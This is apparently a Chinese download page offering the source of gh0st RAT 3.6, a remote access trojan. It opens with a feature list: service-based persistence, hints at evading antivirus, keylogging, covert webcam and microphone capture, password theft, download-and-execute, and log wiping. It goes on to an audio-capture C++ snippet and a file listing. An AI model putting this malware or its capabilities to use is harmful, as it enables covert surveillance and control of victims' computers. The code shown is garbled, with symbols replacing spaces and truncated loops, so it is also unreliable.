資源簡介
gh0st RAT是紅狼小組出品的一款很優秀的遠程控制軟件。自從紅狼上次公布了gh0st 2.5版本的源代碼之后,就一直沒開源了,這次更新的gh0st 3.6 又再次開源
Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net
控制端采用IOCP模型,數據傳輸采用zlib壓縮方式
穩定快速,上線數量無上限,可同時控制上萬臺主機
控制端自動檢測CPU使用率調整自己的工作線程, 穩定高效
宿主為svchost以系統服務啟動,有遠程守護線程,上線間隔為兩分鐘。
心跳包機制防止意外掉線..
支持HTTP和DNS上線兩種方式
自動恢復SSDT(這功能干什么,大家都知道,免殺自己做吧),安裝本程序需要管理員權限
控制端279K,返樸歸真的界面,生成的服務端無殼,106 K,EXE內的資源用UPX壓縮, 可安裝多個服務端
其它細節方面的功能大家自己去發現吧
功能:
文件管理 完全仿Radmin所寫, 文件、文件夾批量上傳、刪除、下載、創建、重命名
屏幕監視 掃描算法速度最快可達到120幀/秒,差異算法適合網絡極差的情況下傳輸,傳輸速度快,控制屏幕,發送Ctrl+Alt+Del,剪貼板操作,7種色彩顯示方式,等......
鍵盤記錄 可記錄中英文信息,離線記錄(記錄上限50M)功能
遠程終端 一個簡單shell
系統管理 進程管理,窗口管理,撥號上網密碼獲取
視頻查看 查看遠程攝像頭,快照,錄像,壓縮等功能...
語音監聽 監聽遠程語音,同時也可以把本地語音傳送給遠程,進行語音聊天,GSM610壓縮方式,傳輸流暢
會話管理 注銷,重啟,關機,卸載服務端
其它功能 下載執行指定URL中的程序,隱藏或者顯示訪問指定網址,清除系統日志
地址位置 將IP數據庫文件QQWry.Dat放置程序同目錄下即可顯示地理位置
集群控制 可同時控制多臺主機,同時打開視頻監控等管理功能
備注功能 .........
代碼片段和文件信息
//?Audio.cpp:?implementation?of?the?CAudio?class.
//
//////////////////////////////////////////////////////////////////////
#include?“Audio.h“
//////////////////////////////////////////////////////////////////////
//?Construction/Destruction
//////////////////////////////////////////////////////////////////////
CAudio::CAudio()
{
m_hEventWaveIn =?CreateEvent(NULL?false?false?NULL);
m_hStartRecord =?CreateEvent(NULL?false?false?NULL);
m_hThreadCallBack =?NULL;
m_nWaveInIndex =?0;
m_nWaveOutIndex =?0;
m_nBufferLength =?1000;?//?m_GSMWavefmt.wfx.nSamplesPerSec?/?8(bit)
m_bIsWaveInUsed =?false;
m_bIsWaveOutUsed =?false;
for?(int?i?=?0;?i? {
m_lpInAudioData[i]?=?new?BYTE[m_nBufferLength];
m_lpInAudioHdr[i]?=?new?WAVEHDR;
m_lpOutAudioData[i]?=?new?BYTE[m_nBufferLength];
m_lpOutAudioHdr[i]?=?new?WAVEHDR;
}
memset(&m_GSMWavefmt?0?sizeof(GSM610WAVEFORMAT));
m_GSMWavefmt.wfx.wFormatTag?=?WAVE_FORMAT_GSM610;?//?ACM?will?auto?convert?wave?format
m_GSMWavefmt.wfx.nChannels?=?1;
m_GSMWavefmt.wfx.nSamplesPerSec?=?8000;
m_GSMWavefmt.wfx.nAvgBytesPerSec?=?1625;
m_GSMWavefmt.wfx.nBlockAlign?=?65;
m_GSMWavefmt.wfx.wBitsPerSample?=?0;
m_GSMWavefmt.wfx.cbSize?=?2;
m_GSMWavefmt.wSamplesPerBlock?=?320;
}
CAudio::~CAudio()
{
if?(m_bIsWaveInUsed)
{
waveInStop(m_hWaveIn);
waveInReset(m_hWaveIn);
for?(int?i?=?0;?i? waveInUnprepareHeader(m_hWaveIn?m_lpInAudioHdr[i]?sizeof(WAVEHDR));
waveInClose(m_hWaveIn);
TerminateThread(m_hThreadCallBack?-1);
}
if?(m_bIsWaveOutUsed)
{
waveOutReset(m_hWaveOut);
for?(int?i?=?0;?i? waveOutUnprepareHeader(m_hWaveOut?m_lpInAudioHdr[i]?sizeof(WAVEHDR));
waveOutClose(m_hWaveOut);
}
for?(int?i?=?0;?i? {
delete?[]?m_lpInAudioData[i];
delete?m_lpInAudioHdr[i];
delete?[]?m_lpOutAudioData[i];
delete?m_lpOutAudioHdr[i];
}
CloseHandle(m_hEventWaveIn);
CloseHandle(m_hStartRecord);
CloseHandle(m_hThreadCallBack);
}
LPBYTE?CAudio::getRecordBuffer(LPDWORD?lpdwBytes)
{
//?Not?open?WaveIn?yet?so?open?it...
if?(!m_bIsWaveInUsed?&&?!InitializeWaveIn())
return?NULL;
if?(lpdwBytes?==?NULL)
return?NULL;
SetEvent(m_hStartRecord);
WaitForSingleobject(m_hEventWaveIn?INFINITE);
*lpdwBytes?=?m_nBufferLength;
return m_lpInAudioData[m_nWaveInIndex];
}
bool?CAudio::playBuffer(LPBYTE?lpWaveBuffer?DWORD?dwBytes)
{
if?(!m_bIsWaveOutUsed?&&?!InitializeWaveOut())
return?NULL;
for?(int?i?=?0;?i? {
memcpy(m_lpOutAudioData[m_nWaveOutIndex]?lpWaveBuffer?m_nBufferLength);
waveOutWrite(m_hWaveOut?m_lpOutAudioHdr[m_nWaveOutIndex]?sizeof(WAVEHDR));
m_nWaveOutIndex?=?1?-?m_nWaveOutIndex;
}
return?true;
}
bool?CAudio::InitializeWaveIn()
{
if?(!waveInGetNumDevs())
return?false;
MMRESULT mmResult;
DWORD dwThreadID?=?0;
m_hThreadCallBack?=?CreateThread(NULL?0 ?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2012-07-31?23:27??common\
?????文件????????5195??2008-03-27?09:23??common\Audio.cpp
?????文件????????1280??2008-03-19?00:31??common\Audio.h
?????文件????????1810??2008-03-25?01:09??common\CursorInfo.h
?????文件????????4188??2008-05-19?01:06??common\macros.h
?????文件????????3636??2008-03-26?03:07??common\VideoCodec.h
?????目錄???????????0??2012-07-31?23:27??common\zlib\
?????文件????????7810??2008-01-04?21:42??common\zlib\zconf.h
?????文件???????40900??2008-01-04?21:42??common\zlib\zlib.h
?????文件???????81534??2007-11-14?21:29??common\zlib\zlib.lib
?????目錄???????????0??2012-10-22?10:49??gh0st\
?????文件????????3598??2008-03-27?09:18??gh0st\AudioDlg.cpp
?????文件????????1652??2008-03-19?11:10??gh0st\AudioDlg.h
?????文件????????1595??2008-03-26?16:55??gh0st\BmpToAvi.cpp
?????文件?????????796??2008-03-26?16:57??gh0st\BmpToAvi.h
?????文件????????6088??2008-05-16?01:34??gh0st\BuildView.cpp
?????文件????????1869??2008-05-16?00:25??gh0st\BuildView.h
?????目錄???????????0??2012-07-31?23:27??gh0st\CJ60Lib\
?????目錄???????????0??2012-08-01?15:50??gh0st\CJ60Lib\CJ60Lib\
?????文件????????3805??1999-03-14?13:57??gh0st\CJ60Lib\CJ60Lib\CJ60Lib.clw
?????文件????????4852??1999-03-10?23:46??gh0st\CJ60Lib\CJ60Lib\CJ60lib.cpp
?????文件?????????188??1998-11-06?03:35??gh0st\CJ60Lib\CJ60Lib\CJ60lib.def
?????文件????????9546??1999-03-12?18:08??gh0st\CJ60Lib\CJ60Lib\CJ60Lib.dsp
?????文件????????2705??1999-02-01?02:02??gh0st\CJ60Lib\CJ60Lib\CJ60Lib.dsw
?????文件??????????40??2008-03-26?19:54??gh0st\CJ60Lib\CJ60Lib\CJ60Lib.positions
?????文件????????4590??1999-02-24?13:14??gh0st\CJ60Lib\CJ60Lib\CJ60Lib.rc
?????文件????????8113??2007-12-31?01:08??gh0st\CJ60Lib\CJ60Lib\CJ60StaticLib.dsp
?????文件????????5959??1999-03-14?01:05??gh0st\CJ60Lib\CJ60Lib\CJCaption.cpp
?????文件???????22780??1999-03-14?15:09??gh0st\CJ60Lib\CJ60Lib\CJControlBar.cpp
?????文件????????8363??1999-03-10?23:46??gh0st\CJ60Lib\CJ60Lib\CJDockBar.cpp
?????文件???????13408??1999-03-10?20:30??gh0st\CJ60Lib\CJ60Lib\CJDockContext.cpp
............此處省略244個文件信息
- 上一篇:necp再分析數據
- 下一篇:惠而浦空調遙控協議分析相關文件
評論
共有 條評論
川公網安備 51152502000135號